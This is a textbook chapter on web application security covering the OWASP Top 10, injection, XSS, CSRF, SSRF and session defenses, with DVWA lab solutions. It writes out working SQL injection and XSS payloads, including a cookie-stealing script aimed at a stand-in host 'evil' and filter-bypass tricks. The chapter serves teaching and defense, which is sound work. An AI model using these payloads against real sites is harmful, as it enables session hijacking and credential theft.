Chapter 10: Web Application Security

“The web is the largest attack surface in history, and every website is a potential entry point.”

Learning Objectives#

After completing this chapter, you will be able to:

Explain the OWASP Top 10 vulnerability categories and the risk each represents.
Identify and exploit SQL injection, XSS, and CSRF in a controlled lab environment.
Explain broken authentication, insecure direct object references, and security misconfigurations.
Describe how HTTPS, CSP, HSTS, and SameSite cookies mitigate web attacks.
Test for injection vulnerabilities using manual and automated techniques.
Explain server-side request forgery (SSRF) and its impact in cloud environments.
Describe the role of a Web Application Firewall and its limitations.
Apply secure coding principles to prevent injection, XSS, and broken auth.

Key Terms#

OWASP: Open Web Application Security Project; produces the Top 10 vulnerability list.
SQL injection (SQLi): injecting SQL code via user input to manipulate a database query.
XSS: Cross-Site Scripting; injecting malicious JavaScript into a page viewed by other users.
CSRF: Cross-Site Request Forgery; tricking a browser into sending an authenticated request.
SSRF: Server-Side Request Forgery; tricking a server into making requests on the attacker’s behalf.
IDOR: Insecure Direct Object Reference; accessing another user’s data by changing a reference.
Broken auth: failures in session management, credential storage, or MFA enforcement.
CSP: Content Security Policy; HTTP header restricting sources of executable content.
HSTS: HTTP Strict Transport Security; forces HTTPS-only connections.
WAF: Web Application Firewall; filters malicious HTTP requests.
Prepared statement: a parameterised query that separates data from SQL structure.
Same-origin policy: browser policy restricting how documents from one origin access another.

10.1 How the Web Works: HTTP, Sessions, and the Same-Origin Policy#

Web attacks all exploit the mechanics of HTTP, so we begin there. The web runs on HTTP, a stateless request/response protocol (Chapter 3): a client sends a request (a method, a path, headers, and an optional body) and the server returns a response (a status code, headers, and a body). The common methods are GET (retrieve, parameters in the URL), POST (submit, parameters in the body), and PUT/DELETE/PATCH; the status codes group into 2xx success, 3xx redirect, 4xx client error (401 unauthorized, 403 forbidden, 404 not found), and 5xx server error. HTTPS is this same protocol inside a TLS tunnel (Chapter 2), which is why serving login forms over plain HTTP leaks credentials (Chapter 3).

Because HTTP is stateless, applications track a logged-in user with a session: the server issues a random session identifier stored in a cookie, and the browser returns it on every subsequent request. The security of the whole application therefore rests on that cookie, which is why cookies should be marked Secure (HTTPS only), HttpOnly (hidden from JavaScript, limiting XSS theft), and SameSite (limiting CSRF). Finally, browsers enforce the same-origin policy (SOP): script from one origin (scheme + host + port) cannot read responses from another, which is the fence that XSS breaks and that CORS selectively relaxes. These three ideas, the request/response model, session cookies, and the same-origin policy, are the stage on which every attack below plays out.
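
The cookie flags and the origin comparison described above can be sketched with Python's standard library. This is a minimal illustration, not a framework's actual session code: the cookie name `session_id` and the helper names `new_session_cookie`, `origin`, and `same_origin` are assumptions made for the example.

```python
import secrets
from http.cookies import SimpleCookie
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def new_session_cookie() -> str:
    """Build a Set-Cookie header value for a fresh, random session ID."""
    cookie = SimpleCookie()
    cookie["session_id"] = secrets.token_urlsafe(32)  # 32 random bytes from the OS CSPRNG
    cookie["session_id"]["secure"] = True       # sent only over HTTPS
    cookie["session_id"]["httponly"] = True     # hidden from JavaScript
    cookie["session_id"]["samesite"] = "Lax"    # withheld on most cross-site requests
    cookie["session_id"]["path"] = "/"
    return cookie["session_id"].OutputString()


def origin(url: str) -> tuple:
    """An origin is the triple (scheme, host, port); default ports are filled in."""
    parts = urlsplit(url)
    port = parts.port or DEFAULT_PORTS.get(parts.scheme)
    return (parts.scheme, parts.hostname, port)


def same_origin(url_a: str, url_b: str) -> bool:
    """True only when scheme, host, and port all match."""
    return origin(url_a) == origin(url_b)
```

Note that `https://example.com/` and `https://api.example.com/` are different origins even though they share a registrable domain, which is why cross-origin reads between them need an explicit CORS policy.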

10.2 The OWASP Top 10#

The OWASP Top 10 [OWASPFoundation25] is the most widely cited reference for web application security risk. The current edition is 2025 (released at OWASP AppSec 2025); the 2021 edition [OWASPFoundation21] is still widely referenced. Both group vulnerabilities into risk categories based on incidence, exploitability, and impact. The full 2025 list with defenses appears below, and the sections that follow examine the most technically significant categories in depth.

Broken Access Control#

Broken access control is the top risk in both the 2021 and 2025 editions of the OWASP Top 10, reflecting how frequently authorization is implemented incorrectly. The application authenticates the user but fails to verify whether that user is authorized to perform a specific action or access a specific resource.

Insecure Direct Object References#

IDOR occurs when a resource identifier in a URL or parameter can be modified to access another user’s data without authorization. If GET /invoice?id=1234 returns a user’s invoice, changing the parameter to id=1235 should not return another user’s invoice without verifying ownership. Horizontal privilege escalation (accessing peer data) is the most common form; vertical privilege escalation (accessing admin data) is the most severe.
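
The ownership check that prevents IDOR can be sketched in a few lines. This is an illustrative model only: the in-memory `INVOICES` table, the `Forbidden` exception, and `get_invoice` are hypothetical names, and a real application would take `current_user` from the server-side session rather than from the request.

```python
# Hypothetical data store: invoice ID -> record with an owner.
INVOICES = {
    1234: {"owner": "alice", "total": 120.0},
    1235: {"owner": "bob", "total": 75.5},
}


class Forbidden(Exception):
    """Raised when the caller may not see the requested object."""


def get_invoice(current_user: str, invoice_id: int) -> dict:
    """Return the invoice only if it belongs to the authenticated caller."""
    invoice = INVOICES.get(invoice_id)
    # Same error for "missing" and "not yours", so the response does not
    # reveal which invoice IDs exist.
    if invoice is None or invoice["owner"] != current_user:
        raise Forbidden("invoice not available")
    return invoice
```

With this check in place, Alice changing `id=1234` to `id=1235` receives the same refusal as she would for an invoice that does not exist.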

Forced Browsing and Path Traversal#

Forced browsing accesses pages or resources that are not linked from the application but are not protected by access controls. Path traversal (../../etc/passwd) exploits insufficient sanitization of file-path inputs to read arbitrary files on the server. A well-structured application validates the canonical (fully resolved) path and allow-lists the directories it may serve from.
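
Canonical path validation can be sketched as follows: resolve the requested path to its absolute form first, then confirm it is still inside the permitted directory. The function name `resolve_inside` and the directory used in the usage note are assumptions for illustration.

```python
import os


def resolve_inside(base_dir: str, user_path: str) -> str:
    """Resolve user_path under base_dir, refusing anything that escapes it."""
    base = os.path.realpath(base_dir)
    # realpath collapses ".." segments and follows symlinks before the check.
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the permitted directory")
    return candidate
```

Calling `resolve_inside("/srv/app/uploads", "../../etc/passwd")` raises `ValueError`, as does an absolute path such as `/etc/passwd`, because the check runs on the resolved path rather than on the raw string.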

The OWASP Top 10:2025#

The OWASP Top 10 is the industry’s consensus list of the most critical web-application security risks, refreshed every few years from data across millions of applications. The current edition is 2025, and it continues a shift in emphasis from individual coding bugs toward how software is designed, built, and operated.

A01:2025 Broken Access Control (still #1): users acting outside their intended permissions, including insecure direct object references (IDOR) and, now folded in, server-side request forgery (SSRF). Defense: deny by default, enforce authorization checks server-side on every request, use indirect object references, and validate outbound requests to block SSRF.
A02:2025 Security Misconfiguration (up from #5): insecure defaults, verbose errors, open cloud storage, missing hardening. Defense: harden and patch every component, disable defaults and verbose errors, automate secure configuration baselines, and lock down cloud storage.
A03:2025 Software Supply Chain Failures (new, expanding “Vulnerable and Outdated Components”): compromised dependencies, build tools, and CI/CD pipelines (Chapter 17). Defense: maintain a software bill of materials (SBOM), pin and verify dependencies, sign artifacts, and secure the build pipeline.
A04:2025 Cryptographic Failures (down from #2): weak or missing encryption of data in transit and at rest (Chapter 2). Defense: enforce TLS, encrypt sensitive data at rest with vetted algorithms (AES-GCM), and manage keys properly.
A05:2025 Injection (down from #3): SQL, command, LDAP, and cross-site scripting flaws where untrusted input is interpreted as code. Defense: use parameterized queries, validate input, encode output, and run with least-privilege accounts.
A06:2025 Insecure Design: flaws in the architecture itself, not fixable by better implementation alone. Defense: threat-model early, apply secure design patterns and reference architectures, and write security requirements before coding.
A07:2025 Authentication Failures: weak credentials, broken session management, missing MFA. Defense: require multi-factor authentication, enforce strong password and session policies, and rate-limit and lock out brute force.
A08:2025 Software or Data Integrity Failures: unverified updates and insecure deserialization. Defense: verify updates with digital signatures, avoid insecure deserialization, and add integrity checks in CI/CD.
A09:2025 Security Logging and Alerting Failures: inability to detect and respond to breaches (Chapter 12). Defense: log security-relevant events centrally, alert on suspicious activity, and test detection and response.
A10:2025 Mishandling of Exceptional Conditions (new): improper error handling, failing open, and logic errors under abnormal conditions. Defense: fail securely (closed), handle errors explicitly without leaking details, and test abnormal and error paths.

The sections that follow examine the highest-impact of these in depth, with hands-on practice on the Damn Vulnerable Web Application (DVWA), and the chapter’s defenses map back to this list.

10.3 Injection Attacks#

Introducing SQL Injection#

SQLi is caused by constructing SQL queries using string concatenation with user-supplied input. The canonical fix is parameterised queries (prepared statements), which separate the SQL structure from the data so that a bound value can never be parsed as SQL.

Error-Based SQLi#

Error-based SQLi submits syntax that causes the database to return an error message containing internal information (table names, column names, version strings). Many production applications display database errors to users, providing free intelligence to attackers.

Union-Based SQLi#

A UNION SELECT appended to the original query extracts data from other tables. The attacker first determines the number of columns in the original query (by incrementing ORDER BY N until an error occurs), then constructs a UNION SELECT with matching column count to extract target data.

Cross-Site Scripting#

XSS injects malicious JavaScript into content served to other users’ browsers.

Reflected XSS#

Reflected XSS occurs when user input is immediately echoed in the response without encoding. The attacker crafts a URL containing a payload (<script>document.location='https://evil/?' + document.cookie</script>) and sends it to a victim. The victim’s browser executes the script in the context of the trusted site, stealing the session cookie.

Stored XSS#

Stored XSS persists the payload in the application’s database (a comment, a username, a profile field). Every user who views the infected page executes the script. Stored XSS is more dangerous because it does not require the attacker to send a crafted link; the payload runs automatically.

DOM-Based XSS#

DOM-based XSS occurs when client-side JavaScript writes attacker-controlled data to the DOM without sanitization. The payload may never reach the server (for example when it travels in the URL fragment); it is injected and executed entirely in the browser. Classic sinks: innerHTML, eval(), document.write().

Cross-Site Request Forgery#

CSRF tricks an authenticated user’s browser into sending a forged request to a target application. Because the browser automatically includes session cookies, the forged request appears legitimate. For example, a hidden, auto-submitting form on a malicious page can send POST /transfer with amount=1000&to=attacker to the banking site; the transfer executes if the victim is logged in and the site has no CSRF protection.

CSRF Mitigations#

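The primary mitigation is a synchronizer token: an unpredictable secret value, tied to the user’s session, that is included in each form and that the server validates before processing the request. The SameSite cookie attribute adds a browser-level defense against cross-site (not merely cross-origin) requests: Strict withholds the cookie from all of them, while Lax still sends it on top-level GET navigations, so state-changing actions must never be reachable via GET. In modern browsers this blocks most CSRF, but it complements tokens rather than replacing them.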
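
A synchronizer token can be sketched with the standard library alone. The `session` dictionary stands in for whatever server-side session object a framework provides, and the function names are hypothetical.

```python
import hmac
import secrets
from typing import Optional


def issue_csrf_token(session: dict) -> str:
    """Create a random token, remember it server-side, and return it for the form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def is_valid_csrf(session: dict, submitted: Optional[str]) -> bool:
    """Accept the request only if the submitted token matches the session's token."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(expected.encode(), submitted.encode())
```

A forged cross-site form cannot read the token out of the victim's page (the same-origin policy prevents that), so it cannot supply a matching value.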

Server-Side Request Forgery#

SSRF causes the server to make HTTP requests on behalf of the attacker. If an application fetches a user-specified URL, an attacker can point it at http://169.254.169.254/ (the AWS Instance Metadata Service) to extract IAM credentials, or at internal services (http://localhost:8080/admin) not accessible externally. SSRF is particularly severe in cloud environments where the metadata service exposes credentials for the host machine’s IAM role.
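
One way to restrict outbound fetches is to allow-list destination hosts and, separately, to refuse any address in an internal range. The sketch below is deliberately incomplete: `ALLOWED_HOSTS` and both function names are hypothetical, and a production check would also have to validate the address the hostname actually resolves to and every redirect hop.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"images.example.com"}  # hypothetical allow-list of fetch targets


def is_safe_fetch_target(url: str) -> bool:
    """Allow only http(s) URLs whose host is explicitly allow-listed."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    # IP literals and names such as "localhost" fail because they are not listed.
    return parts.hostname in ALLOWED_HOSTS


def is_internal_address(ip_text: str) -> bool:
    """True for loopback, private, link-local (cloud metadata), or reserved addresses."""
    ip = ipaddress.ip_address(ip_text)
    return ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved
```

`is_internal_address` is meant to be applied to the resolved IP just before connecting, so that an allow-listed name that suddenly resolves to 169.254.169.254 is still refused.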

10.4 SQL Injection in Depth#

Database Models: Traditional and Modern#

Before dissecting SQL injection it helps to know what kind of database is under attack, because the data model shapes both the query language and the injection technique. The traditional workhorse is the relational database management system (RDBMS), such as MySQL, PostgreSQL, Microsoft SQL Server, and Oracle, which stores data in tables of rows and columns, enforces a fixed schema, guarantees ACID transactions, and is queried with Structured Query Language (SQL). SQL injection is the classic attack against this model.

Modern applications increasingly use non-relational (NoSQL) and specialized databases, each with its own query interface and therefore its own injection risk:

Key-value stores (Redis, Amazon DynamoDB) map a key to an opaque value for fast caching and session storage.
Document stores (MongoDB, Couchbase) hold schema-flexible JSON-like documents and are queried with operators rather than SQL, which gives rise to NoSQL injection (for example smuggling a MongoDB operator such as $ne or $gt through unvalidated input).
Wide-column stores (Apache Cassandra, HBase) spread tables across many nodes for very large workloads.
Graph databases (Neo4j) model entities and their relationships and are queried with graph languages such as Cypher, which can be injected just as SQL can.
Vector databases (Pinecone, Milvus, pgvector) store high-dimensional embeddings for similarity search and underpin AI retrieval systems; their growth brings new concerns such as embedding inversion and prompt injection through retrieved content (Chapter 17).
Time-series databases (InfluxDB, TimescaleDB) optimize for timestamped metrics and telemetry.

The unifying lesson is that injection is not unique to SQL. Any time untrusted input is concatenated into a query, whether SQL, a MongoDB filter, a Cypher statement, or an LDAP or operating-system command, the same flaw appears. SQL injection is simply the most studied instance, and the defenses developed for it (parameterized queries, strict input validation, and least-privilege database accounts) generalize to every data model. The remainder of this section examines SQL injection in depth as the archetype.
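
The MongoDB operator-smuggling case can be shown without a database, because the flaw lies in how the filter is built. In this sketch the two builder functions are hypothetical; the resulting dictionary is the kind of filter a document-store driver would receive.

```python
import json


def build_login_filter_unsafe(body: str) -> dict:
    """Vulnerable: whatever JSON type the client sends goes straight into the filter."""
    data = json.loads(body)
    return {"username": data["username"], "password": data["password"]}


def build_login_filter(body: str) -> dict:
    """Safer: both fields must be plain strings, so no operator object can slip in."""
    data = json.loads(body)
    if not isinstance(data, dict):
        raise ValueError("request body must be a JSON object")
    username, password = data.get("username"), data.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("username and password must be plain strings")
    return {"username": username, "password": password}


# The attacker replaces the password string with an operator object.
ATTACK_BODY = '{"username": "admin", "password": {"$ne": ""}}'
```

Passed to the unsafe builder, `ATTACK_BODY` produces a filter meaning "password is not equal to the empty string", which matches the admin document without knowing the password; the validating builder rejects it.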

SQL injection (SQLi) remains the archetypal injection flaw (A05): it occurs when user input is concatenated into a SQL query so that input becomes code. If a login query is built as SELECT * FROM users WHERE name='$u' AND pass='$p', supplying the username admin' -- comments out the password check, and supplying ' OR '1'='1 makes the WHERE clause always true. SQLi comes in several flavors:

In-band / UNION-based: the attacker uses UNION SELECT to append attacker-chosen columns to the result, reading arbitrary tables (' UNION SELECT username, password FROM users -- ).
Error-based: coaxing the database into error messages that leak data.
Blind boolean-based: when no data or error is returned, the attacker asks true/false questions and infers answers from page differences (' AND 1=1 -- versus ' AND 1=2 -- ).
Blind time-based: inferring answers from deliberate delays (' AND SLEEP(5) -- ).
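
Blind boolean-based extraction is easier to follow with a toy target. The sketch below uses an in-memory SQLite database and a deliberately vulnerable function whose only output is whether a row came back; the table contents and function names are invented for the lab, and the plaintext password exists only so the result is visible.

```python
import sqlite3
import string

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (user_id TEXT, name TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('1', 'admin', 's3cret')")


def page_shows_user(user_id: str) -> bool:
    """Deliberately vulnerable: input is concatenated, output is only true/false."""
    query = f"SELECT name FROM users WHERE user_id = '{user_id}'"
    return db.execute(query).fetchone() is not None


def extract_password(max_len: int = 32) -> str:
    """Recover the admin password one character at a time from yes/no answers."""
    alphabet = string.ascii_letters + string.digits
    recovered = ""
    for position in range(1, max_len + 1):
        for ch in alphabet:
            payload = (
                "1' AND substr((SELECT password FROM users WHERE name='admin'),"
                f"{position},1)='{ch}' -- "
            )
            if page_shows_user(payload):
                recovered += ch
                break
        else:
            break  # no character matched: the end of the string was reached
    return recovered
```

Each request asks one true/false question, so extraction is slow but fully automatable, which is exactly the loop that sqlmap runs at scale.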

The automated tool sqlmap systematizes all of these. The defense is unambiguous: parameterized queries (prepared statements) that send code and data on separate channels so input can never be parsed as SQL, reinforced by least-privilege database accounts, input validation, and stored procedures that do not themselves build dynamic SQL. Where a table or column name must vary, select it from a fixed allow-list, because identifiers cannot be bound as parameters. String concatenation of untrusted input into a query is the root cause and must be eliminated, not filtered.
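
The difference between concatenation and a parameterized query can be demonstrated with SQLite, which ships with Python. This is a sketch of the login example above, not production code: the table stores a plaintext password purely to keep the demonstration short.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, pass TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")


def login_vulnerable(name: str, password: str) -> bool:
    """Builds the query by concatenation, so input can change its structure."""
    query = f"SELECT * FROM users WHERE name='{name}' AND pass='{password}'"
    return conn.execute(query).fetchone() is not None


def login_parameterized(name: str, password: str) -> bool:
    """Sends the SQL text and the values separately; values are never parsed as SQL."""
    query = "SELECT * FROM users WHERE name=? AND pass=?"
    return conn.execute(query, (name, password)).fetchone() is not None
```

Both `login_vulnerable("admin' -- ", "x")` and `login_vulnerable("x", "' OR '1'='1")` succeed without the real password, while the same inputs fail against `login_parameterized`, which simply looks for a user literally named `admin' -- `.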

Hands-On Lab: SQL Injection on DVWA (with solution)

On the Damn Vulnerable Web Application (DVWA) in a local lab, set security to low and open the SQL Injection page, which runs SELECT first_name, last_name FROM users WHERE user_id = '$id'.

Confirm the flaw: enter 1' OR '1'='1 -> the page returns every user, proving the input breaks out of the quoted string.
Enumerate columns: 1' ORDER BY 2 -- succeeds but ORDER BY 3 -- errors, so the query returns two columns.
Extract credentials (UNION): 1' UNION SELECT user, password FROM users -- returns each user’s name and their MD5 password hash, which can then be cracked offline (Chapter 2 or Chapter 9).
Raise the difficulty: at medium, DVWA uses mysqli_real_escape_string and a drop-down, but the id parameter is numeric and unquoted, so injection via the intercepted POST (using Burp/ZAP) still works with payloads like 1 UNION SELECT user,password FROM users -- (no quotes needed).

Why it works and how to fix it: the vulnerable code concatenates $id directly into the query; DVWA’s impossible level uses a prepared statement (PDO with bound parameters) plus an is_numeric check, which defeats every payload above. Write up the exact payloads that worked at low and medium and explain why the parameterized impossible version cannot be injected.

10.5 Cross-Site Scripting (XSS)#

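Cross-site scripting injects attacker JavaScript into pages other users view. Because the injected script runs with the vulnerable site’s own origin, the same-origin policy no longer protects the victim: the script can steal session cookies, perform actions as the victim, or deface content. There are three types: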

Reflected XSS: the malicious script is in the request (a URL parameter) and reflected straight back in the response, delivered by tricking the victim into clicking a crafted link.
Stored (persistent) XSS: the script is saved on the server (a comment, profile, or message) and served to every visitor, the most damaging because it needs no per-victim lure.
DOM-based XSS: the vulnerability is entirely client-side, where JavaScript writes untrusted input into the page (innerHTML) without encoding.

The defense is context-aware output encoding (HTML-encode untrusted data so <script> becomes harmless text), plus input validation, a strong Content Security Policy (CSP) that blocks inline and third-party script, and HttpOnly cookies so that even successful XSS cannot read the session cookie. Encoding on output, not just filtering on input, is the reliable fix because the safe representation depends on where the data is placed (HTML body, attribute, JavaScript, URL).
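
Context-aware encoding means choosing the encoder by destination. The sketch below covers two contexts using only the standard library; the `render_*` helpers are hypothetical, and real applications normally rely on a template engine that auto-escapes.

```python
import html
from urllib.parse import quote


def render_comment(comment: str) -> str:
    """HTML body context: <, >, &, and quotes become entities."""
    return f"<p>{html.escape(comment)}</p>"


def render_search_link(term: str) -> str:
    """URL query context: percent-encode the value before placing it in the href."""
    encoded = quote(term, safe="")
    return f'<a href="/search?q={encoded}">results</a>'
```

For the input `<script>alert(1)</script>`, `render_comment` emits `&lt;script&gt;alert(1)&lt;/script&gt;`, which the browser displays as text instead of executing.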

Hands-On Lab: Reflected and Stored XSS on DVWA (with solution)

On DVWA at low security:

Reflected: the XSS (Reflected) page echoes the name parameter. Enter <script>alert(document.cookie)</script> -> the script executes and pops the cookie, proving arbitrary script runs in the victim’s session. A real attacker would replace the alert with code that sends document.cookie to an attacker server.
Stored: the XSS (Stored) guestbook saves your message. Submit <script>alert('stored XSS')</script> -> it fires for everyone who later views the page, demonstrating persistence.
Medium bypass: at medium, DVWA strips <script> with a naive str_replace. Bypass it with a payload that does not contain that exact tag, for example an event handler, <img src=x onerror=alert(document.cookie)>, or case/nesting tricks such as <SCRIPT> or <scr<script>ipt> (which becomes <script> after the inner one is removed). This shows why blacklist filtering fails.

Why it works and how to fix it: the page inserts input into HTML without encoding. DVWA’s impossible level applies htmlspecialchars() (output encoding) so the payload renders as inert text. Record the payloads that worked at low and the bypass at medium, and explain why output encoding plus a CSP defeats them while blacklist filtering does not.
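
The medium-level bypass can be reproduced outside DVWA. The sketch below models the naive filter as a single-pass string replacement (an assumption that mirrors the behavior described above, not DVWA's PHP source) and compares it with output encoding.

```python
import html


def naive_filter(value: str) -> str:
    """Blacklist approach: remove the exact string "<script>" once, left to right."""
    return value.replace("<script>", "")


PAYLOADS = [
    "<scr<script>ipt>alert(1)</script>",       # nesting: removal re-creates the tag
    "<SCRIPT>alert(1)</SCRIPT>",               # case variation: no exact match
    "<img src=x onerror=alert(document.cookie)>",  # no script tag at all
]

# What the filter lets through versus what output encoding produces.
filtered = [naive_filter(p) for p in PAYLOADS]
encoded = [html.escape(p) for p in PAYLOADS]
```

Every entry in `filtered` still contains live markup, while every entry in `encoded` contains no raw `<` at all, which is the practical difference between enumerating bad input and encoding all output.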

10.6 Broken Access Control, CSRF, SSRF, and Other High-Impact Flaws#

Beyond injection, several classes dominate real breaches. Broken access control (A01) is the failure to enforce what an authenticated user may do. Its commonest form is the insecure direct object reference (IDOR): changing /account?id=123 to id=124 and seeing someone else’s data because the server checks authentication but not authorization. Server-side request forgery (SSRF), now folded under A01, tricks the server into making requests the attacker chooses (for example to internal-only addresses or a cloud metadata endpoint), turning the server into a proxy past the firewall. Both are fixed by server-side authorization checks on every object and by validating and allow-listing outbound request targets.

Cross-site request forgery (CSRF) abuses the fact that browsers auto-attach cookies: a malicious page makes the victim’s browser send an authenticated request (transfer money, change email) without the victim’s intent. The defenses are unpredictable anti-CSRF tokens tied to the session and SameSite cookies. Other recurring flaws include command injection (untrusted input passed to a shell, fixed by avoiding shells and using parameterized APIs), insecure file upload (uploading a web shell, fixed by validating type and storing outside the web root), XML external entity (XXE) injection (fixed by disabling external entities), and insecure deserialization (A08, fixed by avoiding native deserialization of untrusted data). The pattern across all of them is the chapter’s thesis: never trust input, enforce authorization server-side, and fail securely.
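
For command injection, "avoiding shells" means passing an argument vector rather than a command string. In this sketch the child process is simply the Python interpreter echoing its first argument, chosen so the example runs anywhere; `echo_safely` is a hypothetical helper.

```python
import subprocess
import sys


def echo_safely(user_input: str) -> str:
    """Pass untrusted input as one argv element; no shell ever parses it."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", user_input],
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout.rstrip("\n")
```

An input such as `report.txt; echo INJECTED` comes back unchanged as a single argument. Had the same string been interpolated into a command line run with `shell=True`, the shell would have treated `;` as a separator and executed the second command.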

10.7 Authentication and Session Management#

Broken Authentication#

Broken authentication encompasses: weak password policies, missing lockout after failed login attempts (enabling brute force), credential stuffing (automating breach-database credentials against the target), password reset flows that can be bypassed, and session tokens that are too short or predictable.

Secure Password Storage#

Passwords must never be stored in plaintext or as simple, fast hashes. Use a modern salted, deliberately slow password-hashing scheme with a sufficient cost factor: Argon2id or scrypt (both memory-hard), or bcrypt (computationally expensive but not memory-hard), following your organization’s standards. NIST SP 800-63B focuses on password-verifier requirements (for example, checking new passwords against breach corpora and not imposing arbitrary composition or periodic-reset rules) rather than naming a single preferred hashing algorithm.
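
Salted, memory-hard hashing can be sketched with `hashlib.scrypt` from the standard library. scrypt is used here only because it needs no third-party package (Argon2id does); the cost parameters are illustrative assumptions, not a recommendation, and should be tuned to your hardware and standards.

```python
import hashlib
import hmac
import os

# Illustrative cost settings (about 16 MiB of memory per hash); tune for your hardware.
SCRYPT_PARAMS = {"n": 2**14, "r": 8, "p": 1, "dklen": 32}


def hash_password(password: str) -> tuple:
    """Return (salt, digest); a fresh random salt is generated for every password."""
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return salt, digest


def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return hmac.compare_digest(candidate, expected)
```

Because each password gets its own salt, two users with the same password end up with different digests, which defeats precomputed lookup tables.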

Session Management Best Practices#

Session tokens must be generated with a cryptographically secure random number generator (CSPRNG), carry at least 128 bits of entropy, be invalidated on logout, expire after an absolute timeout, and be transmitted only over HTTPS. The HttpOnly attribute prevents JavaScript access to session cookies; the Secure attribute ensures they are sent only over TLS.

Authentication, Sessions, and the Insufficient-Session-Expiration Flaw#

Authentication and session-management failures (A07) are perennial. Beyond weak passwords and missing MFA (Chapter 11), the session itself is a frequent weak point: session IDs must be long, random, regenerated on login (to prevent session fixation), transmitted only over HTTPS, and invalidated on logout and after inactivity. A specific, often-overlooked weakness is insufficient session expiration: when a session token remains valid for too long, or is not destroyed on logout, a token captured or left on a shared computer keeps working long after it should. The fix is short idle and absolute timeouts, server-side session invalidation on logout (not merely deleting the client cookie), and rotating tokens on privilege changes. The lesson is that authenticating a user once is not enough; the session that represents that authentication must be protected throughout its lifetime, which is why session management appears explicitly in the OWASP Top 10.
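
Idle timeouts, absolute timeouts, and server-side invalidation can be sketched as a small in-memory store. The class name, the timeout values, and the injectable `clock` parameter (used so the behavior can be exercised without waiting) are assumptions for illustration.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60           # seconds without activity (illustrative value)
ABSOLUTE_TIMEOUT = 8 * 60 * 60   # maximum session lifetime (illustrative value)


class SessionStore:
    """Server-side session table; the client holds only the opaque token."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}

    def create(self, user: str) -> str:
        """Issue a fresh token at login (never reuse a pre-login identifier)."""
        token = secrets.token_urlsafe(32)
        now = self._clock()
        self._sessions[token] = {"user": user, "created": now, "last_seen": now}
        return token

    def lookup(self, token: str):
        """Return the user for a live session, or None if unknown or expired."""
        record = self._sessions.get(token)
        if record is None:
            return None
        now = self._clock()
        idle_expired = now - record["last_seen"] > IDLE_TIMEOUT
        absolute_expired = now - record["created"] > ABSOLUTE_TIMEOUT
        if idle_expired or absolute_expired:
            del self._sessions[token]
            return None
        record["last_seen"] = now
        return record["user"]

    def logout(self, token: str) -> None:
        """Destroy the session on the server, not just the cookie in the browser."""
        self._sessions.pop(token, None)
```

Because validity is decided by the server's table, a token copied from a shared computer stops working as soon as the user logs out or either timeout elapses.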

10.8 Security Misconfigurations#

Security misconfiguration ranked fifth in OWASP Top 10:2021 and rose to second in the 2025 edition, and it remains extremely common. Examples: default credentials left on administrative interfaces, unnecessary features enabled (debug mode, unnecessary HTTP methods), verbose error messages exposing stack traces, directory listing enabled, missing security headers (CSP, HSTS, X-Frame-Options).

Security Headers#

Header	Purpose
Content-Security-Policy	Restrict sources of scripts, styles, and media
Strict-Transport-Security	Force HTTPS for the defined period
X-Frame-Options	Prevent clickjacking via iframe
X-Content-Type-Options: nosniff	Prevent MIME-type sniffing
Referrer-Policy	Control referrer header on cross-origin requests
Permissions-Policy	Restrict browser features (camera, mic, geolocation)
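
The headers in the table can be applied centrally rather than per page. The values below are illustrative starting points, not a policy that fits every site (a real Content-Security-Policy must be tailored to the scripts and styles the application loads), and `with_security_headers` is a hypothetical helper.

```python
# Example values only; each policy should be tuned to the application.
SECURITY_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Frame-Options": "DENY",
    "X-Content-Type-Options": "nosniff",
    "Referrer-Policy": "strict-origin-when-cross-origin",
    "Permissions-Policy": "camera=(), microphone=(), geolocation=()",
}


def with_security_headers(response_headers: dict) -> dict:
    """Return a copy of the response headers with the security defaults filled in."""
    merged = dict(SECURITY_HEADERS)
    merged.update(response_headers)  # a route may override a default deliberately
    return merged
```

Applying the defaults in one place (middleware, a reverse proxy, or a helper like this) means a newly added route cannot silently ship without them.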

10.9 The Web-Application Testing Toolkit#

Putting offense and defense together requires tooling, and a few tools are ubiquitous. Burp Suite and OWASP ZAP are intercepting proxies that sit between browser and server so a tester can read, modify, and replay every request, the core of manual web testing and of DAST (Section 10.10); ZAP is free and open source. sqlmap automates SQL injection discovery and exploitation; nikto scans for known server issues; and dirb/gobuster/feroxbuster brute-force hidden paths (Chapter 8). For safe, legal practice, deliberately vulnerable targets exist: DVWA (used in the labs above), OWASP WebGoat (a guided lessons app), and OWASP Juice Shop (a modern single-page app). These let learners exploit every flaw in this chapter in an environment they are authorized to attack, which is the only ethical way to build the skill.

Knowledge Check

Why does a parameterized query stop SQL injection where input filtering does not?
Distinguish reflected, stored, and DOM-based XSS, and name the cookie flag that limits cookie theft via XSS.
What is an IDOR, and what single control prevents it?

